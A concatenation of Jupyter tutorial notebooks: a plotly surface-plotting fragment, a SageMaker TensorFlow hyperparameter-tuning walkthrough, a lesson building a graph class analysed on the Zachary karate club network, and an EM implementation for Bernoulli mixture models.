i_xy = tree.regulus.pts.inverse(node.data.x)
surface = go.Surface(
x=i_sxy['x'], y=i_sxy['y'],
z=v
)
pts = go.Scatter3d(
x=i_xy['x'],
y=i_xy['y'],
z=node.data.y,
mode='markers',
marker=dict(
size=2,
line=dict(
color=color,
width=0.5
),
opacity=0.8
)
)
return surface, pts
def surface0(tree, node_id, n=25, color='rgba(217, 217, 217, 0.14)'):
node = tree.find(lambda _,n: n.id == node_id)
model = tree.attr['quadratic'][node]
pts = node.data.x
print(f'id={node_id} size={len(pts)}')
sx = np.linspace( pts['x'].min(), pts['x'].max(), n)
sy = np.linspace( pts['y'].min(), pts['y'].max(), n)
v = model.predict(np.array(np.meshgrid(sx, sy)).T.reshape(-1,2)).reshape(n, n)
surface = go.Surface(
x=sx, y=sy,
z=v
)
pts = go.Scatter3d(
x=node.data.x['x'],
y=node.data.x['y'],
z=node.data.y,
mode='markers',
marker=dict(
size=2,
line=dict(
color=color,
width=0.5
),
opacity=0.8
)
)
return surface, pts
o1 = surface(gauss.tree, 1,color='black')
o12 = surface(gauss.tree, 12, color='yellow')
o34 = surface(gauss.tree, 34, color='green')
o66 = surface(gauss.tree, 66, color='blue')
go.FigureWidget(data=o1+o12+o34+o66, layout=layout)
go.FigureWidget(data=surface0(gauss.tree,12, color='blue'), layout=layout)
node_id = 12
tree = gauss.tree
n = 20
node = tree.find(lambda _,n: n.id == node_id)
model = tree.attr['quadratic'][node]
pts = node.data.x
print(f'id={node_id} size={len(pts)}')
sx = np.linspace( pts['x'].min(), pts['x'].max(), n)
sy = np.linspace( pts['y'].min(), pts['y'].max(), n)
v = model.predict(np.array(np.meshgrid(sx, sy)).T.reshape(-1,2)).reshape(n, n)
p = pts.copy()
p['z'] = node.data.y
p.to_csv('data/n12.csv',index=False)
v = model.predict(np.array(np.meshgrid(sx, sy)).T.reshape(-1,2))
v
xy = np.array(np.meshgrid(sx, sy)).T.reshape(-1,2)
xy
pts = go.Scatter3d(
x=xy[:,0],
y=xy[:,1],
z=v,
mode='markers',
marker=dict(
size=2,
line=dict(
color='blue',
width=0.5
),
opacity=0.8
)
)
```
```
go.FigureWidget(data=[pts], layout=layout)
```
| github_jupyter |
# Hyperparameter Tuning with the SageMaker TensorFlow Container
## [(Original)](https://github.com/awslabs/amazon-sagemaker-examples/tree/master/hyperparameter_tuning/tensorflow_mnist)
This notebook focuses on building a convolutional neural network model with the **SageMaker TensorFlow container** to train on the [MNIST dataset](http://yann.lecun.com/exdb/mnist/).
It uses hyperparameter tuning to run multiple training jobs with different hyperparameter combinations, in order to obtain the best model training result.
## Environment Setup
A few settings are required before starting the workflow:
1. Specify the S3 bucket and prefix where the training dataset and model artifacts will be stored.
2. Get the execution role that allows SageMaker to access resources such as S3.
```
import sagemaker
bucket = '<My bucket name>'#sagemaker.Session().default_bucket() # we are using a default bucket here but you can change it to any bucket in your account
prefix = 'sagemaker/DEMO-hpo-tensorflow-high' # you can customize the prefix (subfolder) here
role = sagemaker.get_execution_role() # we are using the notebook instance role for training in this example
```
Now we import the required Python libraries.
```
import boto3
from time import gmtime, strftime
from sagemaker.tensorflow import TensorFlow
from sagemaker.tuner import IntegerParameter, CategoricalParameter, ContinuousParameter, HyperparameterTuner
```
## Downloading the MNIST dataset
```
import utils
from tensorflow.contrib.learn.python.learn.datasets import mnist
import tensorflow as tf
data_sets = mnist.read_data_sets('data', dtype=tf.uint8, reshape=False, validation_size=5000)
utils.convert_to(data_sets.train, 'train', 'data')
utils.convert_to(data_sets.validation, 'validation', 'data')
utils.convert_to(data_sets.test, 'test', 'data')
```
## Uploading the data
We use the ```sagemaker.Session.upload_data``` function to upload the dataset to an S3 location. The function returns the S3 path, which we will use later when starting the training job.
```
inputs = sagemaker.Session().upload_data(path='data', bucket=bucket, key_prefix=prefix+'/data/mnist')
print (inputs)
```
## Writing a script for distributed training
Below is the complete code for the network model.
```
!cat 'mnist.py'
```
This script is adapted from the [TensorFlow MNIST example](https://github.com/tensorflow/models/tree/master/official/mnist).
It provides a ```model_fn(features, labels, mode)``` that is used for training, evaluation, and inference.
### A typical ```model_fn```
A typical **```model_fn```** follows this pattern:
1. [Define the neural network](https://github.com/tensorflow/models/blob/master/official/mnist/mnist.py#L96)
- [Apply the ```features``` to the neural network](https://github.com/tensorflow/models/blob/master/official/mnist/mnist.py#L178)
- [If ```mode``` is ```PREDICT```, return the output from the neural network](https://github.com/tensorflow/models/blob/master/official/mnist/mnist.py#L186)
- [Compute a loss function comparing the output with the ```labels```](https://github.com/tensorflow/models/blob/master/official/mnist/mnist.py#L188)
- [Create an optimizer and minimize the loss function to improve the neural network](https://github.com/tensorflow/models/blob/master/official/mnist/mnist.py#L193)
- [Return the output, optimizer, and loss function](https://github.com/tensorflow/models/blob/master/official/mnist/mnist.py#L205)
### Writing a ```model_fn``` for distributed training
In distributed training, the same neural network is sent to multiple training instances. Each instance predicts on a batch of the dataset, computes the loss, and minimizes it with the optimizer. One full loop over this process is called a **training step**.
#### Synchronizing training steps
A [global step](https://www.tensorflow.org/api_docs/python/tf/train/global_step) is a global variable shared between the instances.
It is needed for distributed training, so that the optimizer can keep track of the number of **training steps** across runs.
```python
train_op = optimizer.minimize(loss, tf.train.get_or_create_global_step())
```
That is the only change needed for distributed training!
## Setting up the hyperparameter tuning job
*Note: with the default settings below, the hyperparameter tuning job can take about 30 minutes to complete.*
Now we configure the hyperparameter tuning job using the SageMaker Python SDK, following these steps:
* Create an estimator to set up the TensorFlow training job
* Define the ranges of the hyperparameters we plan to tune; in this example we tune "learning_rate"
* Define the objective metric for the tuning job to optimize
* Create a hyperparameter tuner with the above settings, as well as the tuning resource configuration
Similar to training a single TensorFlow job on SageMaker, we define a TensorFlow estimator, passing in the TensorFlow script, the IAM role, and the (per-job) hardware configuration.
```
estimator = TensorFlow(entry_point='mnist.py',
role=role,
framework_version='1.12.0',
training_steps=1000,
evaluation_steps=100,
train_instance_count=1,
train_instance_type='ml.m4.xlarge',
base_job_name='DEMO-hpo-tensorflow')
```
Once we've defined our estimator, we can specify the hyperparameters we'd like to tune and their possible values. We have three different types of hyperparameters:
- Categorical parameters need to take one value from a discrete set. We define them by passing the list of possible values to `CategoricalParameter(list)`
- Continuous parameters can take any real value between the minimum and maximum value defined by `ContinuousParameter(min, max)`
- Integer parameters can take any integer value between the minimum and maximum value defined by `IntegerParameter(min, max)`
*Note: it is almost always best to specify a value as the least restrictive type possible. For example, tuning the learning rate as a continuous value between 0.01 and 0.2 is likely to yield a better result than tuning it as a categorical parameter with possible values 0.01, 0.1, 0.15, or 0.2.*
```
hyperparameter_ranges = {'learning_rate': ContinuousParameter(0.01, 0.02)}
```
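The note about restrictive types can be illustrated with a toy sketch in plain Python (independent of the SageMaker API): random draws from a continuous range can propose learning rates that a fixed categorical list never could.

```python
import random

random.seed(0)

# A categorical search can only ever propose these four learning rates...
categorical_choices = [0.01, 0.1, 0.15, 0.2]

# ...while a continuous range can propose any value in [0.01, 0.2].
continuous_samples = [random.uniform(0.01, 0.2) for _ in range(3)]

print(continuous_samples)  # three rates the categorical list could never propose
print(all(0.01 <= s <= 0.2 for s in continuous_samples))  # True
```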
Next we specify the objective metric to tune for, along with its definition, which includes the regular expression (Regex) needed to extract that metric from the CloudWatch logs of the training job. In this case, our script emits a loss value, which we will use as the objective metric. We also set objective_type to 'Minimize', so that hyperparameter tuning seeks to minimize the objective metric when searching for the best hyperparameter configuration. By default, objective_type is set to 'Maximize'.
```
objective_metric_name = 'loss'
objective_type = 'Minimize'
metric_definitions = [{'Name': 'loss',
'Regex': 'loss = ([0-9\\.]+)'}]
```
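To illustrate how such a Regex pulls the metric out of a log line (the log line below is hypothetical; in practice SageMaker applies the pattern to the CloudWatch logs for you), Python's `re` module behaves as follows:

```python
import re

# Hypothetical CloudWatch log line emitted by the training script.
log_line = "INFO:tensorflow:loss = 0.1625, step = 900"

# The same pattern used in metric_definitions above.
matches = re.findall(r"loss = ([0-9\.]+)", log_line)
print(matches)  # ['0.1625']
```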
Now we create a `HyperparameterTuner` object, passing in:
- The TensorFlow estimator created above
- Our hyperparameter ranges
- The objective metric name and definition
- Tuning resource configurations, such as the total number of training jobs to run and how many training jobs to run in parallel
```
tuner = HyperparameterTuner(estimator,
objective_metric_name,
hyperparameter_ranges,
metric_definitions,
max_jobs=9,
max_parallel_jobs=3,
objective_type=objective_type)
```
## Launching the hyperparameter tuning job
Finally, we can start the hyperparameter tuning job by calling `.fit()` and passing in the S3 paths to our train and test datasets.
After the hyperparameter tuning job is created, we should be able to describe it to see its progress in the next step, and we can go to the SageMaker console -> Jobs to check the status of the hyperparameter tuning job.
```
tuner.fit(inputs)
```
Run a quick check on the hyperparameter tuning job to make sure it started successfully.
```
boto3.client('sagemaker').describe_hyper_parameter_tuning_job(
HyperParameterTuningJobName=tuner.latest_tuning_job.job_name)['HyperParameterTuningJobStatus']
```
## Analyzing the results after the tuning job completes
To analyze the tuning job results, please refer to the "HPO_Analyze_TuningJob_Results.ipynb" example notebook.
## Deploying the best model
Now that we have our best model, we can deploy it to an endpoint. For how to deploy the model, please refer to the SageMaker sample notebooks or the SageMaker documentation.
| github_jupyter |
<div style="width: 100%; overflow: hidden;">
<div style="width: 150px; float: left;"> <img src="data/D4Sci_logo_ball.png" alt="Data For Science, Inc" align="left" border="0"> </div>
<div style="float: left; margin-left: 10px;"> <h1>Graphs and Networks</h1>
<h2>Lesson II - Graph Properties</h2>
<p>Bruno Gonçalves<br/>
<a href="http://www.data4sci.com/">www.data4sci.com</a><br/>
@bgoncalves, @data4sci</p></div>
</div>
```
from collections import Counter
from pprint import pprint
import numpy as np
import matplotlib.pyplot as plt
import watermark
%load_ext watermark
%matplotlib inline
```
We start by printing out the versions of the libraries we're using, for future reference
```
%watermark -n -v -m -g -iv
```
Load default figure style
```
plt.style.use('./d4sci.mplstyle')
```
# Graph class
We now integrate our preferred graph representation into a class that we can build on. For now, we provide it with just placeholders for our data
```
class Graph:
def __init__(self, directed=False):
self._nodes = {}
self._edges = {}
self._directed = directed
```
For ease of explanation, we will be adding methods to this class as we progress. To allow for this in a convenient way, we must declare a Python decorator that will be in charge of modifying the class as we implement further functionality
Understanding this function is not important for the scope of the lecture, but if you are curious, you can find more information on [Decorators](https://www.python.org/dev/peps/pep-0318/) and [setattr](https://docs.python.org/3/library/functions.html#setattr) in the official Python documentation
```
def add_method(cls):
def decorator(func):
setattr(cls, func.__name__, func)
return func
return decorator
```
We can already instantiate our skeleton class
```
G = Graph()
```
and verify that it has nothing hiding inside other than the default Python methods and the fields we defined
```
dir(G)
```
## Nodes
Now we add our first utility methods. *add_node* will be responsible for adding a single node to the Graph, while *add_nodes_from* will prove useful for adding nodes in bulk. We can also add node attributes by passing keyword arguments to either of these two functions
```
@add_method(Graph)
def add_node(self, node, **kwargs):
self._nodes[node] = kwargs
@add_method(Graph)
def add_nodes_from(self, nodes, **kwargs):
for node in nodes:
if isinstance(node, tuple):
self._nodes[node[0]] = node[1:]
else:
self._nodes[node] = kwargs
@add_method(Graph)
def nodes(self):
return list(self._nodes.keys())
```
And we can now check that this added functionality is now available to our Graph
```
dir(G)
```
And that they work as promised
```
G.add_node("A", color="blue")
```
And naturally
```
G._nodes
```
Or, for a more complex example:
```
G.add_node("Z", color="green", size=14)
G._nodes
```
*add_nodes_from* treats the first parameter as an iterable. This means that we can pass a string and it will add a node for each character.
```
G.add_nodes_from("ABC", color='red')
G._nodes
```
Here it is important to note two things:
- Since add_nodes_from expects the first argument to be a list of nodes, it treated each character of the string as an individual node
- By adding the same node twice we overwrite the previous version.
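Both behaviours follow directly from the dict that backs `_nodes`; a minimal standalone sketch (plain dicts, no Graph class needed):

```python
nodes = {}
nodes["A"] = {"color": "blue"}   # first version of node "A"

# Iterating a string yields its characters, and re-assigning an
# existing key replaces the earlier attribute dict.
for node in "ABC":
    nodes[node] = {"color": "red"}

print(nodes["A"])  # {'color': 'red'} -- the "blue" version was overwritten
```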
# Edges
Now we add the equivalent functionality for edges.
```
@add_method(Graph)
def add_edge(self, node_i, node_j, **kwargs):
if node_i not in self._nodes:
self.add_node(node_i)
if node_j not in self._nodes:
self.add_node(node_j)
if node_i not in self._edges:
self._edges[node_i] = {}
if node_j not in self._edges[node_i]:
self._edges[node_i][node_j] = {}
self._edges[node_i][node_j] = kwargs
if not self._directed:
if node_j not in self._edges:
self._edges[node_j] = {}
if node_i not in self._edges[node_j]:
self._edges[node_j][node_i] = {}
self._edges[node_j][node_i] = kwargs
@add_method(Graph)
def add_edges_from(self, edges, **kwargs):
for edge in edges:
self.add_edge(*edge, **kwargs)
```
Before we proceed, let us create a new Graph object
```
G = Graph()
G._directed
```
And add the edges from the edge list we considered before
```
edge_list = [
('A', 'B'),
('A', 'C'),
('A', 'E'),
('B', 'C'),
('C', 'D'),
('C', 'E'),
('D', 'E')]
G.add_edges_from(edge_list)
```
And we can easily check that it looks correct, both for nodes and edges
```
G._nodes
G._edges
```
For completeness, we add a function to return a list of all the edges and their attributes (if any)
```
@add_method(Graph)
def edges(self, node_i=None):
e = []
if node_i is None:
edges = self._edges
else:
edges = [node_i]
for node_i in edges:
for node_j in self._edges[node_i]:
e.append([node_i, node_j, self._edges[node_i][node_j]])
return e
```
So we recover the undirected version of the edge list we started with
```
G.edges()
```
## Graph properties
Now that we have a minimally functional Graph object, we can start implementing functionality to retrieve information about the Graph.
### Node information
Obtaining the number of nodes is simple enough:
```
@add_method(Graph)
def number_of_nodes(self):
return len(self._nodes)
```
So we confirm that we have 5 nodes as expected
```
G.number_of_nodes()
```
And to retrieve the degree of each node one must simply check the number of corresponding entries in the edge dictionary
```
@add_method(Graph)
def degrees(self):
deg = {}
for node in self._nodes:
if node in self._edges:
deg[node] = len(self._edges[node])
else:
deg[node] = 0
return deg
```
With the expected results
```
G.degrees()
```
### Edge Information
The number of edges is simply given by:
```
@add_method(Graph)
def number_of_edges(self):
n_edges = 0
for node_i in self._edges:
n_edges += len(self._edges[node_i])
# If the graph is undirected, don't double count the edges
if not self._directed:
n_edges /= 2
return n_edges
```
And so we find, as expected
```
G.number_of_edges()
```
We also add a convenience method to check whether the graph is directed
```
@add_method(Graph)
def is_directed(self):
return self._directed
G.is_directed()
```
### Weights
As we saw, each edge can potentially have a weight associated with it (it defaults to 1). We also provide a function to recover a dictionary mapping edges to weights
```
@add_method(Graph)
def weights(self, weight="weight"):
w = {}
for node_i in self._edges:
for node_j in self._edges[node_i]:
if weight in self._edges[node_i][node_j]:
w[(node_i, node_j)] = self._edges[node_i][node_j][weight]
else:
w[(node_i, node_j)] = 1
return w
```
Edges without an explicit weight default to 1. Here we assign a weight of 4 to edge (A, B) and verify that `weights()` reports it; note that writing to `_edges` directly only sets the A→B direction, so (B, A) keeps the default weight
```
G._edges['A']['B']['weight']=4
G._edges
G.weights()
```
### Topology and Correlations
One particularly useful property of a graph is the list of nearest neighbors of a given node. With our formulation, this is particularly simple to implement
```
@add_method(Graph)
def neighbours(self, node):
if node in self._edges:
return list(self._edges[node].keys())
else:
return []
```
So we find that node $C$ has as nearest neighbours nodes $A$, $B$, $D$, $E$
```
G.neighbours('C')
```
We are also interested in the degree and weight distributions. Before we can compute them, we define a utility function to generate a probability distribution from a dictionary of values
```
@add_method(Graph)
def _build_distribution(data, normalize=True):
values = data.values()
dist = list(Counter(values).items())
dist.sort(key=lambda x:x[0])
dist = np.array(dist, dtype='float')
if normalize:
norm = dist.T[1].sum()
dist.T[1] /= norm
return dist
```
By default the probability distribution is normalized such that the sum of all values is 1. Using this utility function it is now easy to calculate the degree distribution
```
@add_method(Graph)
def degree_distribution(self, normalize=True):
deg = self.degrees()
dist = Graph._build_distribution(deg, normalize)
return dist
```
The degree distribution for our Graph is then:
```
G.degree_distribution(False)
```
Where we can see that we have two nodes of degree 2, two nodes of degree 3, and one node of degree 4.
Similarly, for the weight distribution
```
@add_method(Graph)
def weight_distribution(self, normalize=True):
deg = self.weights()
dist = Graph._build_distribution(deg, normalize)
return dist
```
And we find that all of our edges have the default weight 1, except for the single weight-4 entry we set above.
```
G.weight_distribution()
```
We now calculate the average degree of the nearest neighbours for each node.
```
@add_method(Graph)
def neighbour_degree(self):
knn = {}
deg = self.degrees()
for node_i in self._edges:
NN = self.neighbours(node_i)
total = [deg[node_j] for node_j in NN]
knn[node_i] = np.mean(total)
return knn
G.neighbour_degree()
```
And the distribution by degree:
```
@add_method(Graph)
def neighbour_degree_function(self):
knn = {}
count = {}
deg = self.degrees()
for node_i in self._edges:
NN = self.neighbours(node_i)
total = [deg[node_j] for node_j in NN]
curr_k = deg[node_i]
knn[curr_k] = knn.get(curr_k, 0) + np.mean(total)
count[curr_k] = count.get(curr_k, 0) + 1
for curr_k in knn:
knn[curr_k]/=count[curr_k]
knn = list(knn.items())
knn.sort(key=lambda x:x[0])
return np.array(knn)
```
From which we obtain:
```
G.neighbour_degree_function()
```
# Zachary Karate Club
J. Anthro. Res. 33, 452 (1977)
Let's now look at an empirical Graph
For convenience, we load the data from a file using numpy
```
edges = np.loadtxt('data/karate.txt')
edges[:10]
```
Now we can use the functions defined above to generate the corresponding graph
```
Karate = Graph()
Karate.add_edges_from(edges)
```
Our graph has 34 nodes
```
Karate.number_of_nodes()
```
And 78 edges
```
Karate.number_of_edges()
```
The degree distribution is:
```
Pk = Karate.degree_distribution()
Pk
```
Which we can plot easily
```
plt.plot(Pk.T[0], Pk.T[1])
plt.xlabel('k')
plt.ylabel('P[k]')
plt.gcf().set_size_inches(11, 8)
```
The average degree of the nearest neighbours as a function of the degree is:
```
knn = Karate.neighbour_degree_function()
```
Which we plot as well
```
plt.plot(knn.T[0], knn.T[1])
plt.xlabel('k')
plt.ylabel(r'$\langle K_{nn}[k] \rangle$')
plt.gcf().set_size_inches(11, 8)
```
Finally, before we proceed to the next notebook, we save the current state of our Graph class. For this we use some Jupyter Notebook magic. It's not important to understand this, but you can read about it in the [Jupyter notebook](https://jupyter-notebook.readthedocs.io/en/stable/examples/Notebook/Importing%20Notebooks.html) documentation.
```
def export_class(path, filename):
import io
from nbformat import read
with io.open(path, 'r', encoding='utf-8') as f:
nb = read(f, 4)
fp = open(filename, "wt")
for cell in nb.cells:
if cell.cell_type == 'code':
first_line = cell.source.split('\n')[0]
if "class " in first_line or "add_method" in first_line:
print(cell.source, file=fp)
print("\n", file=fp)
elif "import" in first_line:
for line in cell.source.split('\n'):
if not line.startswith("%"):
print(line.strip(), file=fp)
print("\n", file=fp)
fp.close()
```
Suffice it to say that after this line we'll have a Python module called "Graph.py" containing all the methods in our Graph class
```
export_class('2. Graph Properties.ipynb', 'Graph.py')
```
<div style="width: 100%; overflow: hidden;">
<img src="data/D4Sci_logo_full.png" alt="Data For Science, Inc" align="center" border="0" width=300px>
</div>
| github_jupyter |
# Session 13: Mixtures of Bernoulli distributions
------------------------------------------------------
*Introduction to Data Science & Machine Learning*
*Pablo M. Olmos olmos@tsc.uc3m.es*
------------------------------------------------------
In this notebook we will implement the EM algorithm for mixtures of Bernoulli distributions. This model is also known as [*latent class analysis*](https://en.wikipedia.org/wiki/Latent_class_model). As well as being of practical importance in its own right, understanding this model and its learning also lays the foundation for **hidden Markov models (HMMs)** over discrete variables. HMMs will be discussed in future course sessions.
### Mixtures of Bernoulli distributions
Consider a set of i.i.d. $D$-dimensional binary (0-1) vectors. Examples of this kind of data are binary images, binary detection results, or genetic markers. Consider also a mixture of multinomials (or multivariate Bernoullis) model for each of the vectors, $\mathbf{x}$,
$$\displaystyle p(\mathbf{x} | \boldsymbol{\Theta},\mathbf{\pi} ) = \sum_{k=1}^K \pi_k p_k(\mathbf{x}|\boldsymbol{\theta}_k) = \sum_{k=1}^K \pi_k \prod_{j=1}^D \theta_{jk}^{x_{j}} (1-\theta_{jk})^{1-x_{j}},$$
where $\boldsymbol{\Theta}=[\boldsymbol{\theta}_1,\ldots,\boldsymbol{\theta}_K]$. If we are given a data set $\mathbf{X}=\{\mathbf{x}^{(1)},\ldots,\mathbf{x}^{(N)}\}$ then the log likelihood function for this model is given by
\begin{align}
\log p(\mathbf{X}|\boldsymbol{\Theta},\mathbf{\pi}) = \sum_{i=1}^N \log\left(\sum_{k=1}^K \pi_k p_k(\mathbf{x}^{(i)}|\boldsymbol{\theta}_k)\right)
\end{align}
To prevent overfitting, we will also use a **prior distribution** for the model parameters. For $\boldsymbol{\Theta}$ we have
\begin{align}
\theta_{jk}&\sim\text{Beta}(\alpha,\beta)\\
p(\boldsymbol{\Theta}) &= \prod_{k=1}^{K} \prod_{j=1}^D p(\theta_{jk})\\
p(\theta_{jk}) &= \frac{\theta_{jk}^{\alpha-1}(1-\theta_{jk})^{\beta-1}}{\text{B}(\alpha,\beta)},
\end{align}
where $\text{B}(\alpha,\beta)$ is the [Beta function](https://en.wikipedia.org/wiki/Beta_function). Check [here](https://en.wikipedia.org/wiki/Beta_distribution) for more details about the Beta distribution.
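To see the regularizing effect of this prior in isolation, consider the MAP estimate of a single Bernoulli parameter under a Beta($\alpha,\beta$) prior (a minimal sketch; the helper name is our own):

```python
def map_bernoulli(n1, n, alpha=2.0, beta=2.0):
    """MAP estimate of a Bernoulli parameter under a Beta(alpha, beta) prior:
    (n1 + alpha - 1) / (n + alpha + beta - 2)."""
    return (n1 + alpha - 1) / (n + alpha + beta - 2)

# With 0 successes in 3 trials the maximum-likelihood estimate would be
# exactly 0; the Beta(2, 2) prior pulls the estimate away from the boundary.
print(map_bernoulli(0, 3))  # 0.2
```

This is the same smoothing that appears in the M-step update for $\boldsymbol{\theta}_k$ below, with hard counts replaced by responsibility-weighted ones.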
For $\mathbf{\pi}$ we use a uniform [Dirichlet distribution](https://en.wikipedia.org/wiki/Dirichlet_distribution):
\begin{align}
\mathbf{\pi}&\sim \text{Dir}(\frac{1}{K}, \ldots, \frac{1}{K}) \Rightarrow p(\mathbf{\pi}) =\frac{1}{\text{B}(\frac{1}{K}, \ldots, \frac{1}{K})}\prod_{k=1}^{K}\pi_k^{\frac{1}{K}-1},
\end{align}
where $\text{B}(\frac{1}{K}, \ldots, \frac{1}{K})$ is the multivariate Beta function.
### EM learning
We now derive the EM algorithm for maximizing the posterior distribution $p(\mathbf{\Theta},\mathbf{\pi}|\mathbf{X})$. To do this, we introduce an explicit discrete latent variable $z\in\{1,\ldots,K\}$ associated with each data point $\mathbf{x}$:
\begin{align}
p(\mathbf{x},z) = \prod_{k=1}^{K} \left(\pi_k ~p_{k}(\mathbf{x})\right)^{\mathbb{1} [z==k]}, ~~ p(z)=\prod_{k=1}^K \pi_k^{\mathbb{1} [z==k]}
\end{align}
#### Complete log-likelihood
We write the complete data log-likelihood as follows:
\begin{align}
\log p(\mathbf{X},\mathbf{z}|\boldsymbol{\Theta},\mathbf{\pi})=\sum_{i=1}^{N}\sum_{k=1}^{K}\mathbb{1} [z^{(i)}==k]\left(\log \pi_k + \sum_{j=1}^D \left[x_{j}^{(i)}\log\theta_{jk}+(1-x_{j}^{(i)})\log(1-\theta_{jk})\right]\right)
\end{align}
#### Posterior distribution of $\mathbf{z}$ given $\boldsymbol{\Theta},\mathbf{\pi}$
In the E-step, we compute the expected complete-data log-likelihood w.r.t. the posterior distribution of $\mathbf{z}$ given the current values of $\boldsymbol{\Theta}$ and $\mathbf{\pi}$:
\begin{align}
p(z^{(i)}=k|\mathbf{x}^{(i)},\boldsymbol{\Theta}_{(t-1)},\mathbf{\pi}_{(t-1)}) \triangleq r_{ik} = \frac{\pi_{(k,t-1)} p_k(\mathbf{x}^{(i)}|\boldsymbol{\theta}_k) }{\sum_{q=1}^K \pi_{(q,t-1)} p_q(\mathbf{x}^{(i)}|\boldsymbol{\theta}_q)}, ~~~ k=1,\ldots, K
\end{align}
#### E-step
It is easy to show that
\begin{align}
\mathcal{Q}(\boldsymbol{\Theta},\mathbf{\pi},\boldsymbol{\Theta}_{(t-1)},\mathbf{\pi}_{(t-1)})&=\mathbb{E}_{p(\mathbf{z}|\mathbf{X},\boldsymbol{\Theta}_{(t-1)},\mathbf{\pi}_{(t-1)})}[\log p(\mathbf{X},\mathbf{z}|\boldsymbol{\Theta},\mathbf{\pi})]\\
&=\sum_{i=1}^{N}\sum_{k=1}^K r_{ik} \left(\log \pi_k + \sum_{j=1}^D \left[x_{j}^{(i)}\log\theta_{jk}+(1-x_{j}^{(i)})\log(1-\theta_{jk})\right]\right)
\end{align}
#### M-step
We have to find
\begin{align}
\boldsymbol{\Theta}_t,\mathbf{\pi}_t = \arg \max_{\boldsymbol{\Theta},\mathbf{\pi}} ~~\mathcal{Q}(\boldsymbol{\Theta},\mathbf{\pi},\boldsymbol{\Theta}_{(t-1)},\mathbf{\pi}_{(t-1)})+ \log p(\boldsymbol{\Theta})+\log p(\mathbf{\pi})
\end{align}
As a result, one can prove that the maximum is attained at
\begin{align}
r_k &\triangleq \sum_{i=1}^N r_{ik} \\\\
\pi^t_k &= \frac{r_k+\frac{1}{K}-1}{N+1-K}\\\\
\boldsymbol{\theta}_k &= \frac{\sum_{i=1}^N r_{ik}\mathbf{x}^{(i)}+\alpha-1}{r_k+\alpha+\beta-2}
\end{align}
To see details about the derivation of this result, check out chapter 9 of Bishop's book. Also Chapter 11 of Murphy's book.
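As a quick numerical sanity check on the $\pi_k$ update (a sketch with a random responsibility matrix): since each row of responsibilities sums to one, $\sum_k r_k = N$, and the MAP probabilities sum to one as well.

```python
import numpy as np

rng = np.random.default_rng(0)
N, K = 6, 3

# Random responsibility matrix whose rows sum to 1.
R = rng.random((N, K))
R /= R.sum(axis=1, keepdims=True)

r = R.sum(axis=0)                       # soft counts r_k, with r.sum() == N
pi = (r + 1.0 / K - 1.0) / (N + 1 - K)  # the MAP update derived above

print(pi.sum())  # 1.0 (up to floating-point rounding)
```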
## Implementation of the E-step
We first write a Python function that evaluates the responsibilities $r_{ik}$, $i=1,\ldots,N$, $k=1,\ldots,K$ for each data point. It should take as input the current values of $\boldsymbol{\pi}$, $\boldsymbol{\Theta}$, and the matrix $\mathbf{X}$ of observations.
```
import matplotlib.pyplot as plt
import numpy as np
from IPython.display import Image
import matplotlib.mlab as mlab
from mpl_toolkits.mplot3d import Axes3D
%matplotlib inline
# THE FOLLOWING FUNCTION takes the whole matrix of data points and the vector
# of probabilities of a single cluster. The function returns the probability of each data
# point given the cluster parameters, p(x|theta_k)
def eval_bern_pdf(X,Thetak):
#Your code here
M = np.exp(X*np.log(Thetak)+(1-X)*np.log(1-Thetak))
pmf = np.prod(M,1)
return pmf
# THE FOLLOWING FUNCTION takes the whole matrix of data points, the matrix of
# per-cluster Bernoulli probabilities Theta and the cluster prior probabilities P.
# The function returns the matrix of responsibilities
def responsibilities(X,P,Theta,K):
N,D = X.shape
R = np.zeros([N,K])
for k in range(K):
#Your code here
R[:,k] = eval_bern_pdf(X,Theta[k,:])
R *= P.T
R /= np.sum(R,1).reshape([-1,1])
return R
#Test your code with the following example
N = 2
D = 5
K = 3
np.random.seed(10)
X = np.random.randint(0,2,[N,D])
Theta = np.random.rand(K,D)
print(Theta)
P = np.random.rand(K,1)
P /= np.sum(P)
print(P)
R = responsibilities(X,P,Theta,K)
# R should be a [N,K] matrix with the following values
# [[ 2.20811374e-02 2.19873976e-01 7.58044887e-01]
# [ 7.49839314e-04 3.34167429e-01 6.65082732e-01]]
print(X)
print(R)
```
## Implementation of the M step
```
# COMPLETE THE FOLLOWING FUNCTION, which computes the soft number of points
# associated with each cluster given the matrix R
def points_cluster(R):
#Your code here
return np.sum(R,0)
# COMPLETE THE FOLLOWING FUNCTION, which updates the cluster probabilities. Note this is
# the maximum-likelihood update r_k/N; with the uniform Dirichlet prior above, the MAP
# update derived earlier would be (r_k + 1/K - 1)/(N + 1 - K)
def new_P(R,N):
#Your code here
Rk = points_cluster(R)
return Rk/N
def new_Theta(R,X,K,alpha,beta):
Theta = np.zeros([K,D])
Rk = points_cluster(R)
for k in range(K):
#Your code here
Theta[k,:] = (np.sum(X*R[:,k].reshape([-1,1]),0)+alpha-1) / (Rk[k]+alpha+beta-2)
return Theta
alpha = 2.
beta = 2.
Theta = new_Theta(R,X,K,alpha,beta)
print(Theta)
# Theta should be a [K,D] matrix with the following values
# [[ 0.50564332 0.50564332 0.49435668 0.50564332 0.49472737]
# [ 0.60846367 0.60846367 0.39153633 0.60846367 0.52237502]
# [ 0.70786949 0.70786949 0.29213051 0.70786949 0.48642146]]
```
## Computing the log-likelihood
```
# COMPLETE THE FOLLOWING FUNCTION, which computes the model log-likelihood
# given the model parameters
def log_lik(X,P,Theta,K):
LL = 0.
for k in range(K):
#Your code here
LL += eval_bern_pdf(X,Theta[k,:])*P[k]
return np.sum(np.log(LL)) #Your code here
#For the toy example the LL should be -5.31111037373
print(log_lik(X,P,Theta,K))
```
## EM for a synthetic dataset
Let's generate samples from a mixture of Bernoulli distributions and run the EM algorithm to recover the true model parameters.
```
## True model parameters
K = 5
D = 100
N = 5000
X = []
Theta_true = np.random.rand(K,D)
P_true = np.random.rand(K,1)
P_true /= np.sum(P_true)
N_Z_true = np.random.multinomial(N,P_true.reshape([-1,]))
for k in range(K):
X.append(np.random.rand(N_Z_true[k],D)<=Theta_true[k,:])
print(X[k].shape)
X = np.concatenate(X)
## EM initialization
K = 5
P = np.random.rand(K,1)
P /= np.sum(P)  # normalize P itself, not P_true
Theta = np.ones([K,D])*1.0/K
Num_Iter = 100
alpha = 0.2
beta = 0.2
LL = np.zeros([Num_Iter,1])
for i in range(Num_Iter):
LL[i] = log_lik(X,P,Theta,K)
R = responsibilities(X,P,Theta,K)
P = new_P(R,N)
Theta = new_Theta(R,X,K,alpha,beta)
# Plot the evolution of the negative LL. It should always decrease!
plt.semilogy(-LL,'-*')
plt.plot(P_true,label='true probs', color = [0, 0.5, 0])
